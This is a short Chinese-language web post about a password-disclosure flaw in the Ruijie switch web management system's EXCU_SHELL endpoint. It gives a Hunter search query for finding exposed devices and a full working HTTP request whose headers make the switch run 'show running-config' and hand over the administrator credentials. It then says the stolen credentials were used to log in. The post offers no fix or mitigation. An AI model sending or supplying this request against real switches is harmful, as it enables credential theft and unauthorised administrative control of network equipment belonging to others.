当前位置:网站首页 > 更多 > web > 正文

[网络安全] 锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞

作者:CC下载站 日期:2023-09-20 02:31:59 浏览:52 分类:web

一、漏洞简介

锐捷交换机 WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。

二、影响版本

  • 锐捷交换机 WEB 管理系统

三、资产测绘

  • hunterweb.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif"

  • 登录页面

  • [网络安全] 锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞

四、漏洞复现

GET /EXCU_SHELL HTTP/1.1
Cmdnum: 1
Command1: show running-config
Confirm1: n
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

[网络安全] 锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞

使用获取的账号密码成功登录系统

[网络安全] 锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞

您需要 登录账户 后才能发表评论

取消回复欢迎 发表评论:

关灯